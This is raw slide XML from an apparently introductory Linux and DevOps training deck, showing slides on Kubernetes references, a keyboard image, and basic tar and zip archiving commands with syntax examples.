                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>Application (USA DC ) 50 USA</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>Database (Singapore DC) 10 Server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2100"/>
            </a:br>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide8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7" name="Shape 5077"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5078" name="Google Shape;5078;p826"/>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solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kubernetes</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> References</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5079" name="Google Shape;5079;p8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https://praveendandu24.medium.com/kubernetes-tutorial-for-beginners-mastering-the-basics-in-1-hour-332db7b5916b</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://medium.com/@lumeilin301/kubernetes-tutorial-for-beginners-getting-started-with-container-orchestration-895a159abe1a</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide8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3" name="Shape 5083"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5084" name="Google Shape;5084;p827"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="572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t>Keyboard</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5085" name="Google Shape;5085;p827"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="44512"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1229628"/>
            <a:ext cx="8991600" cy="2684247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5086" name="Google Shape;5086;p827"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147100" y="4125775"/>
            <a:ext cx="48498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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>45.136.17.143</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:schemeClr val="dk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05"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="203650"/>
            <a:ext cx="8755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600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>File Compression and Archives</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="Google Shape;579;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753050" y="994625"/>
            <a:ext cx="8170200" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B008B"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>tar - Create, list, and extract files from archives.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B008B"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>gzip and gunzip - Compress and decompress files.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B008B"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>zip and unzip - Create and extract zip files.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4304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Files &amp; Folder Compression</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Google Shape;585;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251925" y="1418375"/>
            <a:ext cx="6927000" cy="2728500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-520700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="4600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ZIP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-520700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="4600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TAR (Tape Archive)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:srgbClr val="6AA84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107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="278050"/>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ZIP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591" name="Google Shape;591;p107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="777425"/>
            <a:ext cx="8599200" cy="3263100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zip</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[options]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;destination&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;source&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:srgbClr val="DC143C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zip</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-r             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./my.zip</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 				</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./anil</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:srgbClr val="DC143C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="Google Shape;592;p107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558100" y="4198575"/>
            <a:ext cx="58026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900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-r = recursive</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272450" y="23547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TAR(T</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4020">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ape</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4020">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Ar</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4020">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chive</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4020">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Google Shape;598;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225800" y="808175"/>
            <a:ext cx="8599200" cy="3263100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tar</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[options]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;destination&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;source&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:srgbClr val="DC143C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tar</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-cv  	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-f   ./filename.tar</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./*</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="Google Shape;599;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634300" y="4272850"/>
            <a:ext cx="58026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900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-c = create new archive</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-v = verbose/output the files names</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450425" y="1946425"/>
            <a:ext cx="8520600" cy="132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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All Package Managers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Languages and OS)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3820">
              <a:solidFill>
                <a:schemeClr val="accent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110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10331" l="3240" r="3109" t="6348"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="51435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11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
